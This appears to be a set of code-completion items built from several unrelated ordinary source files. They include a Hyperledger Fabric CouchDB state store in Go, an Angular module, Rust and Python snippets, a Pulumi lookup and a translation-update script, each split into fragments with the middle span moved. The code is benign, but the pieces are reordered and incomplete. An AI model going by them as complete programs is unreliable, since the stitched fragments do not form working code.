return len(key) != 0 && key[0] == '_'
}
// ExecuteQuery implements method in VersionedDB interface
func (vdb *VersionedDB) ExecuteQuery(namespace, query string) (statedb.ResultsIterator, error) {
queryResult, err := vdb.ExecuteQueryWithPagination(namespace, query, "", 0)
if err != nil {
return nil, err
}
return queryResult, nil
}
// ExecuteQueryWithPagination implements method in VersionedDB interface
func (vdb *VersionedDB) ExecuteQueryWithPagination(namespace, query, bookmark string, pageSize int32) (statedb.QueryResultsIterator, error) {
logger.Debugf("Entering ExecuteQueryWithPagination namespace: %s, query: %s, bookmark: %s, pageSize: %d", namespace, query, bookmark, pageSize)
internalQueryLimit := vdb.couchInstance.internalQueryLimit()
queryString, err := applyAdditionalQueryOptions(query, internalQueryLimit, bookmark)
if err != nil {
logger.Errorf("Error calling applyAdditionalQueryOptions(): %s", err.Error())
return nil, err
}
db, err := vdb.getNamespaceDBHandle(namespace)
if err != nil {
return nil, err
}
return newQueryScanner(namespace, db, queryString, internalQueryLimit, pageSize, bookmark, "", "")
}
// executeQueryWithBookmark executes a "paging" query with a bookmark, this method allows a
// paged query without returning a new query iterator
func (scanner *queryScanner) executeQueryWithBookmark() error {
queryLimit := scanner.queryDefinition.internalQueryLimit
if scanner.paginationInfo.requestedLimit > 0 {
if scanner.paginationInfo.requestedLimit-scanner.resultsInfo.totalRecordsReturned < scanner.queryDefinition.internalQueryLimit {
queryLimit = scanner.paginationInfo.requestedLimit - scanner.resultsInfo.totalRecordsReturned
}
}
queryString, err := applyAdditionalQueryOptions(scanner.queryDefinition.query,
queryLimit, scanner.paginationInfo.bookmark)
if err != nil {
logger.Debugf("Error calling applyAdditionalQueryOptions(): %s\n", err.Error())
return err
}
queryResult, bookmark, err := scanner.db.queryDocuments(queryString)
if err != nil {
logger.Debugf("Error calling QueryDocuments(): %s\n", err.Error())
return err
}
scanner.resultsInfo.results = queryResult
scanner.paginationInfo.bookmark = bookmark
scanner.paginationInfo.cursor = 0
return nil
}
// ApplyUpdates implements method in VersionedDB interface
func (vdb *VersionedDB) ApplyUpdates(updates *statedb.UpdateBatch, height *version.Height) error {
if height != nil && updates.ContainsPostOrderWrites {
// height is passed nil when committing missing private data for previously committed blocks
r := &redoRecord{
UpdateBatch: updates,
Version: height,
}
if err := vdb.redoLogger.persist(r); err != nil {
return err
}
}
return vdb.applyUpdates(updates, height)
}
func (vdb *VersionedDB) applyUpdates(updates *statedb.UpdateBatch, height *version.Height) error {
// TODO a note about https://jira.hyperledger.org/browse/FAB-8622
// The write lock is needed only for the stage 2.
// stage 1 - buildCommitters builds committers per namespace (per DB). Each committer transforms the
// given batch in the form of underlying db and keep it in memory.
committers, err := vdb.buildCommitters(updates)
if err != nil {
return err
}
// stage 2 -- executeCommitter executes each committer to push the changes to the DB
if err = vdb.executeCommitter(committers); err != nil {
return err
}
	// Stage 3 - postCommitProcessing - flush and record savepoint.
namespaces := updates.GetUpdatedNamespaces()
if err := vdb.postCommitProcessing(committers, namespaces, height); err != nil {
return err
}
return nil
}
func (vdb *VersionedDB) postCommitProcessing(committers []*committer, namespaces []string, height *version.Height) error {
var wg sync.WaitGroup
wg.Add(1)
errChan := make(chan error, 1)
defer close(errChan)
go func() {
defer wg.Done()
cacheUpdates := make(cacheUpdates)
for _, c := range committers {
if !c.cacheEnabled {
continue
}
cacheUpdates.add(c.namespace, c.cacheKVs)
}
if len(cacheUpdates) == 0 {
return
}
// update the cache
if err := vdb.cache.UpdateStates(vdb.chainName, cacheUpdates); err != nil {
vdb.cache.Reset()
errChan <- err
}
}()
// Record a savepoint at a given height
if err := vdb.ensureFullCommitAndRecordSavepoint(height, namespaces); err != nil {
logger.Errorf("Error during recordSavepoint: %s", err.Error())
return err
}
wg.Wait()
select {
case err := <-errChan:
return errors.WithStack(err)
default:
return nil
}
}
// ClearCachedVersions clears committedVersions and revisionNumbers
func (vdb *VersionedDB) ClearCachedVersions() {
logger.Debugf("Clear Cache")
vdb.verCacheLock.Lock()
defer vdb.verCacheLock.Unlock()
vdb.committedDataCache = newVersionCache()
}
// Open implements method in VersionedDB interface
func (vdb *VersionedDB) Open() error {
// no need to open db since a shared couch instance is used
return nil
}
// Close implements method in VersionedDB interface
func (vdb *VersionedDB) Close() {
// no need to close db since a shared couch instance is used
}
// writeChannelMetadata saves channel metadata to metadataDB
func (vdb *VersionedDB) writeChannelMetadata() error {
couchDoc, err := encodeChannelMetadata(vdb.channelMetadata)
if err != nil {
return err
}
if _, err := vdb.metadataDB.saveDoc(channelMetadataDocID, "", couchDoc); err != nil {
return err
}
_, err = vdb.metadataDB.ensureFullCommit()
return err
}
// ensureFullCommitAndRecordSavepoint flushes all the dbs (corresponding to `namespaces`) to disk
// and Record a savepoint in the metadata db.
// Couch parallelizes writes in a cluster or sharded setup, and ordering is not guaranteed.
// Hence we need to fence the savepoint with sync. So ensure_full_commit on all updated
// namespace DBs is called before savepoint to ensure all block writes are flushed. Savepoint
// itself is flushed to the metadataDB.
func (vdb *VersionedDB) ensureFullCommitAndRecordSavepoint(height *version.Height, namespaces []string) error {
// ensure full commit to flush all changes on updated namespaces until now to disk
// namespace also includes empty namespace which is nothing but metadataDB
errsChan := make(chan error, len(namespaces))
defer close(errsChan)
var commitWg sync.WaitGroup
commitWg.Add(len(namespaces))
for _, ns := range namespaces {
go func(ns string) {
defer commitWg.Done()
db, err := vdb.getNamespaceDBHandle(ns)
if err != nil {
errsChan <- err
return
}
_, err = db.ensureFullCommit()
if err != nil {
errsChan <- err
return
}
}(ns)
}
commitWg.Wait()
select {
case err := <-errsChan:
logger.Errorf("Failed to perform full commit")
return errors.Wrap(err, "failed to perform full commit")
default:
logger.Debugf("All changes have been flushed to the disk")
}
// If a given height is nil, it denotes that we are committing pvt data of old blocks.
// In this case, we should not store a savepoint for recovery. The lastUpdatedOldBlockList
// in the pvtstore acts as a savepoint for pvt data.
if height == nil {
return nil
}
// construct savepoint document and save
savepointCouchDoc, err := encodeSavepoint(height)
if err != nil {
return err
}
_, err = vdb.metadataDB.saveDoc(savepointDocID, "", savepointCouchDoc)
if err != nil {
logger.Errorf("Failed to save the savepoint to DB %s", err.Error())
return err
}
// Note: Ensure full commit on metadataDB after storing the savepoint is not necessary
// as CouchDB syncs states to disk periodically (every 1 second). If peer fails before
// syncing the savepoint to disk, ledger recovery process kicks in to ensure consistency
// between CouchDB and block store on peer restart
return nil
}
// GetLatestSavePoint implements method in VersionedDB interface
func (vdb *VersionedDB) GetLatestSavePoint() (*version.Height, error) {
var err error
couchDoc, _, err := vdb.metadataDB.readDoc(savepointDocID)
if err != nil {
logger.Errorf("Failed to read savepoint data %s", err.Error())
return nil, err
}
// ReadDoc() not found (404) will result in nil response, in these cases return height nil
if couchDoc == nil || couchDoc.jsonValue == nil {
return nil, nil
}
return decodeSavepoint(couchDoc)
}
// readChannelMetadata returns channel metadata stored in metadataDB
func (vdb *VersionedDB) readChannelMetadata() (*channelMetadata, error) {
var err error
couchDoc, _, err := vdb.metadataDB.readDoc(channelMetadataDocID)
if err != nil {
logger.Errorf("Failed to read db name mapping data %s", err.Error())
return nil, err
}
// ReadDoc() not found (404) will result in nil response, in these cases return nil
if couchDoc == nil || couchDoc.jsonValue == nil {
return nil, nil
}
return decodeChannelMetadata(couchDoc)
}
// GetFullScanIterator implements method in VersionedDB interface. This function returns a
// FullScanIterator that can be used to iterate over entire data in the statedb for a channel.
// `skipNamespace` parameter can be used to control if the consumer wants the FullScanIterator
// to skip one or more namespaces from the returned results.
func (vdb *VersionedDB) GetFullScanIterator(skipNamespace func(string) bool) (statedb.FullScanIterator, byte, error) {
namespacesToScan := []string{}
for ns := range vdb.channelMetadata.NamespaceDBsInfo {
if skipNamespace(ns) {
continue
}
namespacesToScan = append(namespacesToScan, ns)
}
sort.Strings(namespacesToScan)
// if namespacesToScan is empty, we can return early with a nil FullScanIterator. However,
// the implementation of this method needs be consistent with the same method implemented in
// the stateleveldb pkg. Hence, we don't return a nil FullScanIterator by checking the length
// of the namespacesToScan.
dbsToScan := []*namespaceDB{}
for _, ns := range namespacesToScan {
db, err := vdb.getNamespaceDBHandle(ns)
if err != nil {
return nil, byte(0), errors.WithMessagef(err, "failed to get database handle for the namespace %s", ns)
}
dbsToScan = append(dbsToScan, &namespaceDB{ns, db})
}
// the database which belong to an empty namespace contains
// internal keys. The scanner must skip these keys.
toSkipKeysFromEmptyNs := map[string]bool{
savepointDocID: true,
channelMetadataDocID: true,
}
return newDBsScanner(dbsToScan, vdb.couchInstance.internalQueryLimit(), toSkipKeysFromEmptyNs)
}
// applyAdditionalQueryOptions will add additional fields to the query required for query processing
func applyAdditionalQueryOptions(queryString string, queryLimit int32, queryBookmark string) (string, error) {
const jsonQueryFields = "fields"
const jsonQueryLimit = "limit"
const jsonQueryBookmark = "bookmark"
//create a generic map for the query json
jsonQueryMap := make(map[string]interface{})
//unmarshal the selector json into the generic map
decoder := json.NewDecoder(bytes.NewBuffer([]byte(queryString)))
decoder.UseNumber()
err := decoder.Decode(&jsonQueryMap)
if err != nil {
return "", err
}
if fieldsJSONArray, ok := jsonQueryMap[jsonQueryFields]; ok {
switch fieldsJSONArray := fieldsJSONArray.(type) {
case []interface{}:
//Add the "_id", and "version" fields, these are needed by default
jsonQueryMap[jsonQueryFields] = append(fieldsJSONArray, idField, versionField)
default:
return "", errors.New("fields definition must be an array")
}
}
// Add limit
// This will override any limit passed in the query.
// Explicit paging not yet supported.
jsonQueryMap[jsonQueryLimit] = queryLimit
// Add the bookmark if provided
if queryBookmark != "" {
jsonQueryMap[jsonQueryBookmark] = queryBookmark
}
//Marshal the updated json query
editedQuery, err := json.Marshal(jsonQueryMap)
if err != nil {
return "", err
}
logger.Debugf("Rewritten query: %s", editedQuery)
return string(editedQuery), nil
}
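// Illustrative example (added; the selector value is made up): given the query
// `{"selector":{"owner":"tom"},"fields":["owner"]}`, a queryLimit of 1000 and an
// empty bookmark, the rewritten query keeps the selector, extends "fields" with the
// internal id and version fields, and adds "limit": 1000; a non-empty bookmark would
// be added under the "bookmark" key as well.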
type queryScanner struct {
namespace string
db *couchDatabase
queryDefinition *queryDefinition
paginationInfo *paginationInfo
resultsInfo *resultsInfo
exhausted bool
}
type queryDefinition struct {
startKey string
endKey string
query string
internalQueryLimit int32
}
type paginationInfo struct {
cursor int32
requestedLimit int32
bookmark string
}
type resultsInfo struct {
totalRecordsReturned int32
results []*queryResult
}
func newQueryScanner(namespace string, db *couchDatabase, query string, internalQueryLimit,
limit int32, bookmark, startKey, endKey string) (*queryScanner, error) {
scanner := &queryScanner{namespace, db, &queryDefinition{startKey, endKey, query, internalQueryLimit}, &paginationInfo{-1, limit, bookmark}, &resultsInfo{0, nil}, false}
var err error
// query is defined, then execute the query and return the records and bookmark
if scanner.queryDefinition.query != "" {
err = scanner.executeQueryWithBookmark()
} else {
err = scanner.getNextStateRangeScanResults()
}
if err != nil {
return nil, err
}
scanner.paginationInfo.cursor = -1
return scanner, nil
}
func (scanner *queryScanner) Next() (statedb.QueryResult, error) {
doc, err := scanner.next()
if err != nil {
return nil, err
}
if doc == nil {
return nil, nil
}
kv, err := couchDocToKeyValue(doc)
if err != nil {
return nil, err
}
scanner.resultsInfo.totalRecordsReturned++
return &statedb.VersionedKV{
CompositeKey: statedb.CompositeKey{
Namespace: scanner.namespace,
Key: kv.key,
},
VersionedValue: *kv.VersionedValue,
}, nil
}
func (scanner *queryScanner) next() (*couchDoc, error) {
if len(scanner.resultsInfo.results) == 0 {
return nil, nil
}
scanner.paginationInfo.cursor++
if scanner.paginationInfo.cursor >= scanner.queryDefinition.internalQueryLimit {
if scanner.exhausted {
return nil, nil
}
var err error
if scanner.queryDefinition.query != "" {
err = scanner.executeQueryWithBookmark()
} else {
err = scanner.getNextStateRangeScanResults()
}
if err != nil {
return nil, err
}
if len(scanner.resultsInfo.results) == 0 {
return nil, nil
}
}
if scanner.paginationInfo.cursor >= int32(len(scanner.resultsInfo.results)) {
return nil, nil
}
result := scanner.resultsInfo.results[scanner.paginationInfo.cursor]
return &couchDoc{
jsonValue: result.value,
attachments: result.attachments,
}, nil
}
func (scanner *queryScanner) Close() {}
func (scanner *queryScanner) GetBookmarkAndClose() string {
retval := ""
if scanner.queryDefinition.query != "" {
retval = scanner.paginationInfo.bookmark
} else {
retval = scanner.queryDefinition.startKey
}
scanner.Close()
return retval
}
func constructCacheValue(v *statedb.VersionedValue, rev string) *CacheValue {
return &CacheValue{
Version: v.Version.ToBytes(),
Value: v.Value,
Metadata: v.Metadata,
AdditionalInfo: []byte(rev),
}
}
func constructVersionedValue(cv *CacheValue) (*statedb.VersionedValue, error) {
height, _, err := version.NewHeightFromBytes(cv.Version)
if err != nil {
return nil, err
}
return &statedb.VersionedValue{
Value: cv.Value,
Version: height,
Metadata: cv.Metadata,
}, nil
}
type dbsScanner struct {
dbs []*namespaceDB
nextDBToScanIndex int
resultItr *queryScanner
currentNamespace string
prefetchLimit int32
toSkipKeysFromEmptyNs map[string]bool
}
type namespaceDB struct {
ns string
db *couchDatabase
}
func newDBsScanner(dbsToScan []*namespaceDB, prefetchLimit int32, toSkipKeysFromEmptyNs map[string]bool) (*dbsScanner, byte, error) {
if len(dbsToScan) == 0 {
return nil, fullScanIteratorValueFormat, nil
}
s := &dbsScanner{
dbs: dbsToScan,
prefetchLimit: prefetchLimit,
toSkipKeysFromEmptyNs: toSkipKeysFromEmptyNs,
}
if err := s.beginNextDBScan(); err != nil {
return nil, byte(0), err
}
return s, fullScanIteratorValueFormat, nil
}
func (s *dbsScanner) beginNextDBScan() error {
dbUnderScan := s.dbs[s.nextDBToScanIndex]
queryScanner, err := newQueryScanner(dbUnderScan.ns, dbUnderScan.db, "", s.prefetchLimit, 0, "", "", "")
if err != nil {
return errors.WithMessagef(
err,
"failed to create a query scanner for the database %s associated with the namespace %s",
dbUnderScan.db.dbName,
dbUnderScan.ns,
)
}
s.resultItr = queryScanner
s.currentNamespace = dbUnderScan.ns
s.nextDBToScanIndex++
return nil
}
// Next returns the key-values present in the namespaceDB. Once a namespaceDB
// is processed, it moves to the next namespaceDB till all are processed.
// The <version, value, metadata> is converted to []byte using a proto.
func (s *dbsScanner) Next() (*statedb.CompositeKey, []byte, error) {
if s == nil {
return nil, nil, nil
}
for {
couchDoc, err := s.resultItr.next()
if err != nil {
return nil, nil, errors.WithMessagef(
err,
"failed to retrieve the next entry from scanner associated with namespace %s",
s.currentNamespace,
)
}
if couchDoc == nil {
s.resultItr.Close()
if len(s.dbs) <= s.nextDBToScanIndex {
break
}
if err := s.beginNextDBScan(); err != nil {
return nil, nil, err
}
continue
}
if s.currentNamespace == "" {
key, err := couchDoc.key()
if err != nil {
return nil, nil, errors.WithMessagef(
err,
"failed to retrieve key from the couchdoc present in the empty namespace",
)
}
if s.toSkipKeysFromEmptyNs[key] {
continue
}
}
fields, err := validateAndRetrieveFields(couchDoc)
if err != nil {
return nil, nil, errors.WithMessagef(
err,
"failed to validate and retrieve fields from couch doc with id %s",
fields.id,
)
}
dbval, err := encodeValueVersionMetadata(fields.value, []byte(fields.versionAndMetadata))
if err != nil {
return nil, nil, errors.WithMessagef(
err,
"failed to encode value [%v] version and metadata [%v]",
fields.value,
fields.versionAndMetadata,
)
}
return &statedb.CompositeKey{
Namespace: s.currentNamespace,
Key: fields.id,
}, dbval, nil
}
return nil, nil, nil
}
func (s *dbsScanner) Close() {
if s == nil {
return
}
s.resultItr.Close()
}
| {
return err
} |
fundamental-ngx-core.module.ts | import { NgModule } from '@angular/core';
import { ActionBarModule } from './action-bar/action-bar.module';
import { AlertModule } from './alert/alert.module';
import { AlertService } from './alert/alert-service/alert.service';
import { BadgeLabelModule } from './badge-label/badge-label.module';
import { BarModule } from './bar/bar.module';
import { BreadcrumbModule } from './breadcrumb/breadcrumb.module';
import { BusyIndicatorModule } from './busy-indicator/busy-indicator.module';
import { ButtonModule } from './button/button.module';
import { CalendarModule } from './calendar/calendar.module';
import { ComboboxModule } from './combobox/combobox.module';
import { CheckboxModule } from './checkbox/checkbox.module';
import { DatePickerModule } from './date-picker/date-picker.module';
import { DatetimePickerModule } from './datetime-picker/datetime-picker.module';
import { FileInputModule } from './file-input/file-input.module';
import { FormModule } from './form/form.module';
import { IconModule } from './icon/icon.module';
import { IdentifierModule } from './identifier/identifier.module';
import { ImageModule } from './image/image.module';
import { InfiniteScrollModule } from './infinite-scroll/infinite-scroll.module';
import { InlineHelpModule } from './inline-help/inline-help.module';
import { InputGroupModule } from './input-group/input-group.module';
import { ListModule } from './list/list.module';
import { LoadingSpinnerModule } from './loading-spinner/loading-spinner.module';
import { MenuModule } from './menu/menu.module';
import { DialogModule } from './dialog/dialog.module';
import { DialogService } from './dialog/dialog-service/dialog.service';
import { MessageStripModule } from './message-strip/message-strip.module';
import { MultiInputModule } from './multi-input/multi-input.module';
import { PaginationModule } from './pagination/pagination.module';
import { PanelModule } from './panel/panel.module';
import { PopoverModule } from './popover/popover.module';
import { ScrollSpyModule } from './scroll-spy/scroll-spy.module';
import { ShellbarModule } from './shellbar/shellbar.module';
import { SideNavigationModule } from './side-navigation/side-navigation.module';
import { SelectModule } from './select/select.module';
import { SplitButtonModule } from './split-button/split-button.module';
import { TableModule } from './table/table.module';
import { TabsModule } from './tabs/tabs.module';
import { TileModule } from './tile/tile.module';
import { TreeModule } from './tree/tree.module';
import { TimeModule } from './time/time.module';
import { TimePickerModule } from './time-picker/time-picker.module';
import { SegmentedButtonModule } from './segmented-button/public_api';
import { SwitchModule } from './switch/switch.module';
import { TokenModule } from './token/token.module';
import { CommonModule } from '@angular/common';
import { FormsModule } from '@angular/forms';
import { LocalizationEditorModule } from './localizator-editor/localization-editor.module';
import { MegaMenuModule } from './mega-menu/mega-menu.module';
import { LayoutGridModule } from './layout-grid/layout-grid.module';
import { DragAndDropModule } from './utils/drag-and-drop/drag-and-drop.module';
import { ProductSwitchModule } from './product-switch/product-switch.module';
import { NotificationModule } from './notification/notification.module';
import { NotificationService } from './notification/notification-service/notification.service';
import { NestedListModule } from './nested-list/nested-list.module';
import { RadioModule } from './radio/radio.module';
import { LinkModule } from './link/link.module';
import { InfoLabelModule } from './info-label/info-label.module';
import { ObjectStatusModule } from './object-status/object-status.module';
import { MultiInputMobileModule } from './multi-input/multi-input-mobile/multi-input-mobile.module';
@NgModule({
imports: [CommonModule, FormsModule],
exports: [
ActionBarModule,
AlertModule,
BadgeLabelModule,
BarModule,
BreadcrumbModule,
BusyIndicatorModule,
ButtonModule,
SegmentedButtonModule,
CalendarModule,
ComboboxModule,
CheckboxModule,
DatePickerModule,
DatetimePickerModule,
DragAndDropModule,
FileInputModule,
FormModule,
IconModule,
IdentifierModule,
ImageModule,
InfoLabelModule,
InlineHelpModule,
InfiniteScrollModule,
InputGroupModule,
LayoutGridModule,
LinkModule,
ListModule,
LoadingSpinnerModule,
LocalizationEditorModule,
MenuModule,
MegaMenuModule,
DialogModule,
MessageStripModule,
MultiInputModule,
MultiInputMobileModule,
NestedListModule,
NotificationModule,
ObjectStatusModule,
PaginationModule,
PanelModule,
ProductSwitchModule,
PopoverModule,
RadioModule,
ScrollSpyModule,
SelectModule,
ShellbarModule,
SideNavigationModule,
SplitButtonModule,
TableModule,
TabsModule,
TileModule,
TimeModule,
TimePickerModule,
SwitchModule,
TokenModule,
TreeModule
],
providers: [AlertService, DialogService, NotificationService]
})
export class | {}
| FundamentalNgxCoreModule |
linux.rs | use errno;
use std::{
error,
fmt,
path,
ffi,
os,
};
use crate::error::Result;
extern {
fn linux_xch_syscall(path1: *const os::raw::c_char, path2: *const os::raw::c_char) -> os::raw::c_long;
}
pub fn xch<A: AsRef<path::Path>, B: AsRef<path::Path>>(path1: A, path2: B) -> Result<()> {
use std::os::unix::ffi::OsStrExt;
let path1 = path1.as_ref().as_os_str().as_bytes();
let path2 = path2.as_ref().as_os_str().as_bytes();
let path1 = ffi::CString::new(path1).expect("path cannot contain null byte");
let path2 = ffi::CString::new(path2).expect("path cannot contain null byte");
let ret = unsafe {
linux_xch_syscall(path1.as_ptr(), path2.as_ptr())
};
if ret == 0 {
Ok(())
} else {
Err(PlatformError(errno::errno()).into())
}
}
#[derive(Debug)]
pub struct PlatformError(errno::Errno);
impl fmt::Display for PlatformError {
fn fmt(&self, fmt: &mut fmt::Formatter) -> fmt::Result {
write!(fmt, "{}", self.0)
}
}
impl error::Error for PlatformError {
fn | (&self) -> &str {
"OSError"
}
}
| description |
languages.rs | use markup;
use crate::handlers::admin::{
languages_get::AgoLanguages,
scope_languages::new_get::ra_languages_new,
scope_languages::edit_get::ra_languages_edit_w_id,
};
use crate::i18n::{
translate_i18n::TranslateI18N,
t_date::t_date,
};
use crate::templates::{
admin_layout::AdminLayout,
widgets::admin_panel::AdminPanel,
widgets::admin_lang_dropdown::AdminLangDropdown,
};
markup::define! {
Languages<'a>(
domain: &'a str,
title: &'a str,
q: &'a AgoLanguages,
t: &'a TranslateI18N,
success: &'a bool,
) {
@AdminLayout {
domain: domain,
title: title,
data: &q.data,
routes: &q.routes,
content: AdminPanel {
content: Content {
q: q,
t: t,
success: success,
},
current_page: "languages",
data: &q.data,
t: t,
},
}
}
Content<'a>(
q: &'a AgoLanguages,
t: &'a TranslateI18N,
success: &'a bool,
) {
div[class = "box is-marginless mb-6"] {
h1[class = "title"] {
@t.languages
@if q.data.languages.iter().len() > 1 {
div[class = "is-pulled-right"] {
@AdminLangDropdown {
routes: &q.routes,
data: &q.data,
}
}
}
a[
href = ra_languages_new(&q.data.lang.code),
class = "button is-link is-pulled-right \
has-text-weight-normal mr-4",
] {
@t.add_language
}
}
@if **success {
div[
class = "notification is-success",
] {
button[class = "delete"] {}
@t.your_website_languages_were_successfully_updated
}
}
@if q.some_lang_without_names {
div[
class = "notification is-danger",
] {
button[class = "delete"] {}
@t.there_are_languages_without_names
}
}
table[
class = "table is-bordered is-hoverable is-fullwidth",
] {
thead {
tr {
th {
@t.language
}
th {
@t.code
}
th {
@t.last_update
}
}
}
tbody {
@for lang in q.data.languages.iter() {
tr[
class = if !lang.has_all_names {
"has-background-danger-light"
} else {
""
},
] {
td {
a[
href = ra_languages_edit_w_id(
&q.data.lang.code,
&lang.id,
),
class = if !lang.has_all_names {
"has-text-danger"
} else {
""
},
] { | @if lang.id != q.data.lang.id {
" ("
@lang.original_name
")"
}
}
}
td {
@lang.code
}
td {
{t_date(&lang.date, &q.data.lang.code)}
}
}
}
}
}
}
}
} | @lang.name
|
test.py | from PyQt4 import QtCore, QtGui
class MainWindow(QtGui.QMainWindow):
def __init__(self, parent=None):
super(MainWindow, self).__init__(parent)
self.central_widget = QtGui.QStackedWidget()
self.setCentralWidget(self.central_widget)
login_widget = LoginWidget(self)
login_widget.button.clicked.connect(self.login)
self.central_widget.addWidget(login_widget)
def login(self):
|
class LoginWidget(QtGui.QWidget):
def __init__(self, parent=None):
super(LoginWidget, self).__init__(parent)
layout = QtGui.QHBoxLayout()
self.button = QtGui.QPushButton('Login')
layout.addWidget(self.button)
self.setLayout(layout)
        # you might want to do self.button.clicked.connect(self.parent().login) here
class LoggedWidget(QtGui.QWidget):
def __init__(self, parent=None):
super(LoggedWidget, self).__init__(parent)
layout = QtGui.QHBoxLayout()
self.label = QtGui.QLabel('logged in!')
layout.addWidget(self.label)
self.setLayout(layout)
if __name__ == '__main__':
app = QtGui.QApplication([])
window = MainWindow()
window.show()
app.exec_() | logged_in_widget = LoggedWidget(self)
self.central_widget.addWidget(logged_in_widget)
self.central_widget.setCurrentWidget(logged_in_widget) |
main.rs | use std::fs;
use std::io::prelude::*;
use std::net::TcpListener;
use std::net::TcpStream;
fn main() {
let ecouteur = TcpListener::bind("127.0.0.1:7878").unwrap();
for flux in ecouteur.incoming() {
let flux = flux.unwrap();
gestion_connexion(flux);
}
}
fn | (mut flux: TcpStream) {
let mut tampon = [0; 1024];
flux.read(&mut tampon).unwrap();
let get = b"GET / HTTP/1.1\r\n";
if tampon.starts_with(get) {
let contenu = fs::read_to_string("hello.html").unwrap();
let reponse = format!(
"HTTP/1.1 200 OK\r\nContent-Length: {}\r\n\r\n{}",
contenu.len(),
contenu
);
flux.write(reponse.as_bytes()).unwrap();
flux.flush().unwrap();
} else {
let ligne_statut = "HTTP/1.1 404 NOT FOUND";
let contenu = fs::read_to_string("404.html").unwrap();
let reponse = format!(
"{}\r\nContent-Length: {}\r\n\r\n{}",
ligne_statut,
contenu.len(),
contenu
);
flux.write(reponse.as_bytes()).unwrap();
flux.flush().unwrap();
}
}
| gestion_connexion |
getVirtualNetwork.go | // *** WARNING: this file was generated by the Pulumi SDK Generator. ***
// *** Do not edit by hand unless you're certain you know what you are doing! ***
package v20160515
import (
"github.com/pulumi/pulumi/sdk/v3/go/pulumi"
)
func LookupVirtualNetwork(ctx *pulumi.Context, args *LookupVirtualNetworkArgs, opts ...pulumi.InvokeOption) (*LookupVirtualNetworkResult, error) {
var rv LookupVirtualNetworkResult
err := ctx.Invoke("azure-native:devtestlab/v20160515:getVirtualNetwork", args, &rv, opts...)
if err != nil {
return nil, err | }
return &rv, nil
}
type LookupVirtualNetworkArgs struct {
Expand *string `pulumi:"expand"`
LabName string `pulumi:"labName"`
Name string `pulumi:"name"`
ResourceGroupName string `pulumi:"resourceGroupName"`
}
// A virtual network.
type LookupVirtualNetworkResult struct {
AllowedSubnets []SubnetResponse `pulumi:"allowedSubnets"`
CreatedDate string `pulumi:"createdDate"`
Description *string `pulumi:"description"`
ExternalProviderResourceId *string `pulumi:"externalProviderResourceId"`
ExternalSubnets []ExternalSubnetResponse `pulumi:"externalSubnets"`
Id string `pulumi:"id"`
Location *string `pulumi:"location"`
Name string `pulumi:"name"`
ProvisioningState *string `pulumi:"provisioningState"`
SubnetOverrides []SubnetOverrideResponse `pulumi:"subnetOverrides"`
Tags map[string]string `pulumi:"tags"`
Type string `pulumi:"type"`
UniqueIdentifier *string `pulumi:"uniqueIdentifier"`
} | |
test_run.py | #!/usr/bin/python
#
# Copyright 2019 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
from __future__ import absolute_import, division, print_function
from unittest import TestCase
import pytest
from polyaxon_sdk import V1Run
from polyaxon.managers.run import RunManager
@pytest.mark.managers_mark
class | (TestCase):
def test_default_props(self):
assert RunManager.IS_GLOBAL is False
assert RunManager.IS_POLYAXON_DIR is True
assert RunManager.CONFIG_FILE_NAME == ".polyaxonrun"
assert RunManager.CONFIG == V1Run
| TestRunManager |
update-translations.py | #!/usr/bin/env python
# Copyright (c) 2014 Wladimir J. van der Laan
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Run this script from the root of the repository to update all translations from
transifex.
It will do the following automatically:
- fetch all translations using the tx tool
- post-process them into valid and committable format
- remove invalid control characters
- remove location tags (makes diffs less noisy)
TODO:
- auto-add new translations to the build system according to the translation process
'''
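# A typical invocation (illustrative only; the script's location in the tree may
# differ) is, from the repository root:
#   python update-translations.py
# It requires the transifex client ('tx') to be installed and configured.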
from __future__ import division, print_function | import sys
import os
import io
import xml.etree.ElementTree as ET
# Name of transifex tool
TX = 'tx'
# Name of source language file
SOURCE_LANG = 'ionos_en.ts'
# Directory with locale files
LOCALE_DIR = 'src/qt/locale'
# Minimum number of messages for translation to be considered at all
MIN_NUM_MESSAGES = 10
def check_at_repository_root():
if not os.path.exists('.git'):
print('No .git directory found')
print('Execute this script at the root of the repository', file=sys.stderr)
exit(1)
def fetch_all_translations():
if subprocess.call([TX, 'pull', '-f', '-a']):
print('Error while fetching translations', file=sys.stderr)
exit(1)
def find_format_specifiers(s):
'''Find all format specifiers in a string.'''
pos = 0
specifiers = []
while True:
percent = s.find('%', pos)
if percent < 0:
break
try:
specifiers.append(s[percent+1])
except:
print('Failed to get specifier')
pos = percent+2
return specifiers
def split_format_specifiers(specifiers):
'''Split format specifiers between numeric (Qt) and others (strprintf)'''
numeric = []
other = []
for s in specifiers:
if s in {'1','2','3','4','5','6','7','8','9'}:
numeric.append(s)
else:
other.append(s)
# If both numeric format specifiers and "others" are used, assume we're dealing
# with a Qt-formatted message. In the case of Qt formatting (see https://doc.qt.io/qt-5/qstring.html#arg)
# only numeric formats are replaced at all. This means "(percentage: %1%)" is valid, without needing
# any kind of escaping that would be necessary for strprintf. Without this, this function
# would wrongly detect '%)' as a printf format specifier.
if numeric:
other = []
# numeric (Qt) can be present in any order, others (strprintf) must be in specified order
return set(numeric),other
def sanitize_string(s):
'''Sanitize string for printing'''
return s.replace('\n',' ')
def check_format_specifiers(source, translation, errors, numerus):
source_f = split_format_specifiers(find_format_specifiers(source))
# assert that no source messages contain both Qt and strprintf format specifiers
# if this fails, go change the source as this is hacky and confusing!
assert(not(source_f[0] and source_f[1]))
try:
translation_f = split_format_specifiers(find_format_specifiers(translation))
except IndexError:
errors.append("Parse error in translation for '%s': '%s'" % (sanitize_string(source), sanitize_string(translation)))
return False
else:
if source_f != translation_f:
if numerus and source_f == (set(), ['n']) and translation_f == (set(), []) and translation.find('%') == -1:
# Allow numerus translations to omit %n specifier (usually when it only has one possible value)
return True
errors.append("Mismatch between '%s' and '%s'" % (sanitize_string(source), sanitize_string(translation)))
return False
return True
def all_ts_files(suffix=''):
for filename in os.listdir(LOCALE_DIR):
# process only language files, and do not process source language
if not filename.endswith('.ts'+suffix) or filename == SOURCE_LANG+suffix:
continue
if suffix: # remove provided suffix
